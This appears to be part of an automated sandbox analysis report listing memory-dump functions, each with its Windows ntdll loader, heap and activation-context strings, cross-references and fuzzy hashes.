                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E8181, 015E81F5
                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015E8170
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 015AC6C4
                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015E81E5
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015AC6C3
                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 015E8177, 015E81EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                              • Opcode ID: 21d88cbfc836d8d2fb99b10dfa70169c088188fdc651bd241679e3db2c5e0600
                                                                                                                                                              • Instruction ID: c684f825259619b492767e9b855d7b9a2bbb3466deee4f60222b8284283189e1
                                                                                                                                                              • Opcode Fuzzy Hash: 21d88cbfc836d8d2fb99b10dfa70169c088188fdc651bd241679e3db2c5e0600
                                                                                                                                                              • Instruction Fuzzy Hash: C231E0B1A447039BD324EF28DD4AE2ABBD4FBD4B14F000518F945AF291E660EC04C7A2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 015B2DF0: LdrInitializeThunk.NTDLL ref: 015B2DFA
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BA3
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BB6
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D60
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404860816-0
                                                                                                                                                              • Opcode ID: c50d12992be1138470959b4d544fe1556e644ce64ace60dd3527b36055c534de
                                                                                                                                                              • Instruction ID: 9f707ccfc29dc553fb228b6e230f1be22fc7e920ce5627ca849873b221aa616c
                                                                                                                                                              • Opcode Fuzzy Hash: c50d12992be1138470959b4d544fe1556e644ce64ace60dd3527b36055c534de
                                                                                                                                                              • Instruction Fuzzy Hash: 13425A71900716DFDB25CF28C884BEAB7F5BF44314F1445A9E989EB281E770AA84CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0157A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                              • Opcode ID: c3e6d0a70d08fd3f686de9d3e9f22cda89b3895f6bafbdb989a04dfce3100407
                                                                                                                                                              • Instruction ID: 90979a0b319eee53aa5ab06f9e42833eafafe10fb8c736621889a1fa11894903
                                                                                                                                                              • Opcode Fuzzy Hash: c3e6d0a70d08fd3f686de9d3e9f22cda89b3895f6bafbdb989a04dfce3100407
                                                                                                                                                              • Instruction Fuzzy Hash: EDC18871508382CFDB21CF58D045B6EB7E4BF84704F08896AF9968F251E735DA49CB62
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 015A8591
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 015A8422
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015A8421
                                                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015A855E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1918872054
                                                                                                                                                              • Opcode ID: 4cec545773eb3f4c33f820088c9a8827f249679a07abd45f4d264f4d97089830
                                                                                                                                                              • Instruction ID: 58469d66739868a17453bb913d3eec7bd7ecba836bc0e74922b11e0b1e6e21fd
                                                                                                                                                              • Opcode Fuzzy Hash: 4cec545773eb3f4c33f820088c9a8827f249679a07abd45f4d264f4d97089830
                                                                                                                                                              • Instruction Fuzzy Hash: 6F917171558346AFD721EF25CC85EAFBAE8BF88744F40092DFA849A151E730D944CB62
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • .Local, xrefs: 015A28D8
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E21DE
                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015E21D9, 015E22B1
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015E22B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                              • Opcode ID: dd661199b72a0648ba5562fd90351f970415c4b217a5dbcde3ce339a9c668f81
                                                                                                                                                              • Instruction ID: dce63a4f20059bf22b4b01ebea0cc6af66f13b04fd2bad0dd63e089350f74266
                                                                                                                                                              • Opcode Fuzzy Hash: dd661199b72a0648ba5562fd90351f970415c4b217a5dbcde3ce339a9c668f81
                                                                                                                                                              • Instruction Fuzzy Hash: 2CA19B3194022A9FDB24CF68C889BADB7B5BF58754F5445EAD908AF251D7309EC0CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015E342A
                                                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015E3456
                                                                                                                                                              • RtlDeactivateActivationContext, xrefs: 015E3425, 015E3432, 015E3451
                                                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015E3437
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                              • API String ID: 0-1245972979
                                                                                                                                                              • Opcode ID: c86cb315e26ea9d6a94a45341639ae8881592ea7336db3706007202d16b2884f
                                                                                                                                                              • Instruction ID: f8bafbbe7c22f1c67586bc288d3649c00b94dc674fb94ae6ef26c505af8ad3d0
                                                                                                                                                              • Opcode Fuzzy Hash: c86cb315e26ea9d6a94a45341639ae8881592ea7336db3706007202d16b2884f
                                                                                                                                                              • Instruction Fuzzy Hash: 40612136A907129FD766CF5CC859B2EB7E1BF80B10F58852DE9599F240D7B0E801CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015D106B
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015D0FE5
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015D1028
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015D10AE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                              • API String ID: 0-1468400865
                                                                                                                                                              • Opcode ID: 43c83280dfef16ea6db6327231b9ab4e3d14ae1e082ef16c4fd5f7821510ed42
                                                                                                                                                              • Instruction ID: cc1be4ac2f6511af9011017ff8f01335362990b6ef48eecfc36329c5dee19ba5
                                                                                                                                                              • Opcode Fuzzy Hash: 43c83280dfef16ea6db6327231b9ab4e3d14ae1e082ef16c4fd5f7821510ed42
                                                                                                                                                              • Instruction Fuzzy Hash: 6F71F0B19047069FDB20DF18C885B9B7FA8BF95764F400469F9488F286D334D588DBD2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015E362F
                                                                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 015E365C
                                                                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 015E3640, 015E366C
                                                                                                                                                              • LdrpFindDllActivationContext, xrefs: 015E3636, 015E3662
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                              • API String ID: 0-3779518884
                                                                                                                                                              • Opcode ID: fd4a910405afc82702b6667b537131811c1927951c571478e8bac6314f5f2cb8
                                                                                                                                                              • Instruction ID: a6458d3af064669ea21b3299cca249f7de7923de6e7be5de30e3044167afd021
                                                                                                                                                              • Opcode Fuzzy Hash: fd4a910405afc82702b6667b537131811c1927951c571478e8bac6314f5f2cb8
                                                                                                                                                              • Instruction Fuzzy Hash: BB312B32980251AEDF369A9CCC49B3E7AE4BB01754F8E402AD9096F662D7E09C8087D5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0159245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • LdrpDynamicShimModule, xrefs: 015DA998
                                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015DA992
                                                                                                                                                              • apphelp.dll, xrefs: 01592462
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA9A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-176724104
                                                                                                                                                              • Opcode ID: 5de390e53500abfbb15654d97cdb96317f3152925fc4121d621acd6de0a6f360
                                                                                                                                                              • Instruction ID: da41944b9ab55a3493e3e009f2189e13f83bd73162bd87ebba615d504fa9b808
                                                                                                                                                              • Opcode Fuzzy Hash: 5de390e53500abfbb15654d97cdb96317f3152925fc4121d621acd6de0a6f360
                                                                                                                                                              • Instruction Fuzzy Hash: 4C312676A00202EBDB319F6DDC85AAE7BB4FBC4B04F16001DE915AF265C7B09951CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0158327D
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01583255
                                                                                                                                                              • HEAP: , xrefs: 01583264
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                              • API String ID: 0-617086771
                                                                                                                                                              • Opcode ID: c5a3fa0fd47d983056d417969284b890694cbc6ade4dadf88253a238adeaf21b
                                                                                                                                                              • Instruction ID: 86bddf520398bd18b1f851598a788fb8bbf93d252c6277ad0d46f9eace8e599a
                                                                                                                                                              • Opcode Fuzzy Hash: c5a3fa0fd47d983056d417969284b890694cbc6ade4dadf88253a238adeaf21b
                                                                                                                                                              • Instruction Fuzzy Hash: 89929A70A042499FDB25DF68C444BAEBFF1FF48704F188499E85AAF291D735A941CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01580770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                              • Opcode ID: 50e6f26208e0e784e5dc447ecadfbec6e15f8aceec369d27198880e9d2da52b1
                                                                                                                                                              • Instruction ID: 799f420426a6c0b375607d391e83c80c9a1bc3edaba5ab96f8d13659d43fcaac
                                                                                                                                                              • Opcode Fuzzy Hash: 50e6f26208e0e784e5dc447ecadfbec6e15f8aceec369d27198880e9d2da52b1
                                                                                                                                                              • Instruction Fuzzy Hash: B6F18930A10606DFEB25EF68C894B6EB7F5FB44304F148568E556AF391D730E985CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01596962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $@
                                                                                                                                                              • API String ID: 0-1077428164
                                                                                                                                                              • Opcode ID: 6b194f6f534796efa9cb311786bea8b1f6d84df4d9e6f62fa9ac1c128711c0ce
                                                                                                                                                              • Instruction ID: 747c8e90c42204938227da6144ae0877a4ab4eda93e0b994856a3a7cd40ae48b
                                                                                                                                                              • Opcode Fuzzy Hash: 6b194f6f534796efa9cb311786bea8b1f6d84df4d9e6f62fa9ac1c128711c0ce
                                                                                                                                                              • Instruction Fuzzy Hash: 66C25D716183419FEB25CF29C881BAFBBE5BF88754F04892EE9898B241D734D845CB53
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0156A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                              • Opcode ID: 90303deb71053b27233264f958aa08671473f969cf053da53373df8d54f1f409
                                                                                                                                                              • Instruction ID: 5f2a59d33538170b735ca1312295f648e9860f6f29289aed9a678c000e15ecfc
                                                                                                                                                              • Opcode Fuzzy Hash: 90303deb71053b27233264f958aa08671473f969cf053da53373df8d54f1f409
                                                                                                                                                              • Instruction Fuzzy Hash: FBA12B7191162A9FDB319F68CC88BA9B7B8FF44B10F1041E9D90DAB250E735AE85CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01590BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015DA10F
                                                                                                                                                              • LdrpCheckModule, xrefs: 015DA117
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA121
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-161242083
                                                                                                                                                              • Opcode ID: daf81fba2aee3fd43ea16abaf0b0a359941e88d3186152e5c3451c6afdf0eb88
                                                                                                                                                              • Instruction ID: bbde79a04d3853e2d6181f5642319d278b1dafa08263f9fed7adcc96e22adf81
                                                                                                                                                              • Opcode Fuzzy Hash: daf81fba2aee3fd43ea16abaf0b0a359941e88d3186152e5c3451c6afdf0eb88
                                                                                                                                                              • Instruction Fuzzy Hash: 0D719E71A00206DFDF25EF68CD81ABEB7F8FB84604F14486DE906AF295E734A941CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01580A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-1334570610
                                                                                                                                                              • Opcode ID: c7566c6a42b41c27eee859865b1374d0f30a2e1a8c2a4760201765447f56216f
                                                                                                                                                              • Instruction ID: f843f9240676804ce36d754727bacfff652256ccc198c5b92a95dd2e171da25c
                                                                                                                                                              • Opcode Fuzzy Hash: c7566c6a42b41c27eee859865b1374d0f30a2e1a8c2a4760201765447f56216f
                                                                                                                                                              • Instruction Fuzzy Hash: DD61BC70610302DFDB29DF28C880B6ABBF1FF44704F14856AE8599F292D7B0E885CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 015E82D7
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E82E8
                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015E82DE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                              • Opcode ID: 9aa0ae409d19a2510147b33cafe42cf3595362148127446f6043cd6f5843b92d
                                                                                                                                                              • Instruction ID: 01280e0eab32db401bc614d3efcb6fcb785c4ebd127501b463d127d15ba2379c
                                                                                                                                                              • Opcode Fuzzy Hash: 9aa0ae409d19a2510147b33cafe42cf3595362148127446f6043cd6f5843b92d
                                                                                                                                                              • Instruction Fuzzy Hash: 7C41F2B1594312ABC721EB68ED44B5F7BE8BF84750F00482EF949DB261EB70D800CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0162C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • PreferredUILanguages, xrefs: 0162C212
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0162C1C5
                                                                                                                                                              • @, xrefs: 0162C1F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                              • Opcode ID: 37bfe3d2a49746eefa02470daba41c193cae5fcfe58f7ebf3b55c3dbd4be15f8
                                                                                                                                                              • Instruction ID: 3c2c65f35b18430cea1b089217f60ae27657e4d314d829aaad5c2f25e326d581
                                                                                                                                                              • Opcode Fuzzy Hash: 37bfe3d2a49746eefa02470daba41c193cae5fcfe58f7ebf3b55c3dbd4be15f8
                                                                                                                                                              • Instruction Fuzzy Hash: D0418371E0161AEBDF11DBD8CC91FEEBBB8BB55700F14806AE605B7240DB749A458F50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01604144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                              • Opcode ID: b6e825ebc068c77b04f2c2eb72e5e1e9ecaac2d1e2a35b4cf38a387bd8dca804
                                                                                                                                                              • Instruction ID: 8c7224cb9ecb2873edf7f07fb66ced00c2b0b2a3ac30af8d9ea5cd3945aaf994
                                                                                                                                                              • Opcode Fuzzy Hash: b6e825ebc068c77b04f2c2eb72e5e1e9ecaac2d1e2a35b4cf38a387bd8dca804
                                                                                                                                                              • Instruction Fuzzy Hash: C441E431A0065A8BEB3ADB99CC40BAEBBB4FF95740F14045ADA01AF7D1DB359901CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • LdrpCheckRedirection, xrefs: 015F488F
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015F4899
                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015F4888
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                              • Opcode ID: dfd33d1c25ddffcfc48814ee273020e71d6b0c1177fbe8eecd2205f3655c6c34
                                                                                                                                                              • Instruction ID: 51d17df0920c9775a07a8fd9ffbfe61fffcd79543b0dc32cff2fb74ea496165f
                                                                                                                                                              • Opcode Fuzzy Hash: dfd33d1c25ddffcfc48814ee273020e71d6b0c1177fbe8eecd2205f3655c6c34
